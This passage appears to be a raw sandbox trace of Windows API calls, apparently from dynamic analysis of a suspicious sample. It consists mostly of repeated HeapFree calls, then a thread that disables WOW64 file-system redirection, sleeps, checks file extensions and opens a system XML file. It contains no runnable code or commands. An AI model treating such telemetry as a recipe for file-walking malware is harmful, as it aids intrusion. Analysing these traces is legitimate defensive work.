hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0176.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0176.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0176.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0176.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0176.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0177.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0177.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0177.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0177.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5171078 | out: hHeap=0x6a0000) returned 1 [0177.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0177.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0177.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0177.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0177.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0177.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0177.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0177.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0178.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3da0948 | out: hHeap=0x6a0000) returned 1 Thread: id = 47 os_tid = 0xe88 [0155.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3dc0958 [0155.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3dd0960 [0155.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7035c0 [0155.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b5f8 [0155.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7034e8 [0155.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x4082020 [0155.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703578 [0155.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703578, Size=0x20) returned 0x6ddf70 [0155.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703530 [0155.199] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703530, Size=0x20) returned 0x6dde80 [0155.199] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.199] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.199] Wow64DisableWow64FsRedirection (in: OldValue=0x363ff50 | out: OldValue=0x363ff50*=0x0) returned 1 [0155.199] lstrlenW (lpString="kernel32.dll") returned 12 [0155.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.199] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.199] Sleep (dwMilliseconds=0x64) [0155.600] Sleep (dwMilliseconds=0x64) [0156.203] Sleep (dwMilliseconds=0x64) [0156.867] Sleep (dwMilliseconds=0x64) [0157.263] Sleep (dwMilliseconds=0x64) [0157.482] Sleep (dwMilliseconds=0x64) [0157.943] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0157.943] lstrlenW (lpString="keypadbase.xml") returned 14 [0157.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.093] GetFileSizeEx 